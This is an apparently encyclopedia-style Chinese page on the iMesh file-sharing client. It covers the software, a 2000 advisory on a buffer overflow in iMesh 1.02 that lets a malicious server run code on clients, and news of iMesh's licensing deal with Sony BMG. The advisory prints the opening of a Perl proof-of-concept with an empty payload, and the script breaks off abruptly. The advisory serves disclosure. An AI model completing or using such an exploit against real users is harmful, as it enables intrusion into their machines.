imesh
imesh
iMesh是一個文件分享軟體。能夠讓你設定分享文件的類型,音樂、影片或其他文件;也能夠讓你搜尋並且下載你想要的文件。由於iMesh只是一個交換文件的機制,所有的文件其實還是在個人的電腦裡面,因此網路組態的設定就顯得相當重要。如果你在公司內部使用iMesh的話,一定要設定好防火牆(Firewall),ADSL、Cable Modem連接網路的人應該不會有問題,大多可以順利交換文件。iMesh只支持英文,沒有辦法搜尋中文,所以就算你把中文文件分享出去,別人也沒辦法找到!
iMesh是點對點的虛擬在線社區,一個成員可以搜索和下載另一個成員 PC 上的數字媒體文件和其他文件,也可以從自己的 PC上載和共享這些文件。幾乎任何類型的文件都可以共享:音頻、視頻、遊戲、軟體、文檔:可以共享能夠識別的任何文件格式。
受影響系統:
iMesh 1.02
描述:
iMesh 1.02中存在一個緩衝區溢出漏洞,攻擊者可能執行任意代碼。
當iMesh客戶端連結到一個伺服器時,伺服器可以利用這個漏洞來攻
擊iMesh客戶,並可能在iMesh客戶端正在運行的主機上執行任意命令。
<* 來源:Chopsui-cide[MmM] 2000
*>
測試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
#!/usr/bin/perl
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#
use IO::Socket;
$localhost = "localhost";
$port = "5000";
# Dummy payload
$payload = "";
索尼貝塔斯曼與P2P網站iMesh已達成授權協議
此前,美國法院指出,Grokster等網站應對用戶的版權侵權行為負責。業內分析師稱,此決定進一步推動了媒體公司製造網站的活動。
6月27日,美國法院做出了有利於娛樂公司而不利於文件交換網站的決定后,iMesh宣布退出受到業內“制裁”的文件交換服務。同時,iMesh公司還雇傭索尼娛樂公司前總裁Robert Summer擔任公司主席,負責與音樂界進行交涉。
索尼貝塔斯曼公司,是業內第四大唱片公司,是由索尼和貝塔斯曼公司成立的合資公司。音樂雜誌“電子公告欄”本周五稱,在未來10天內iMesh還與環球唱片公司達成協議。對此,iMesh公司代表未發表評論。
其它的P2P網站採取措施不得不滿足娛樂公司的賠償的要求,比如Mashboxx網站,已與索尼貝塔斯曼公司達成授權協議。2001年,音樂界就關閉了業內第一個文件交換網站Napster,然後與Napster的繼承者
Grokster和Streamcast對簿公堂。因此,Napster開始轉型,成為一家商業化在線音樂網站。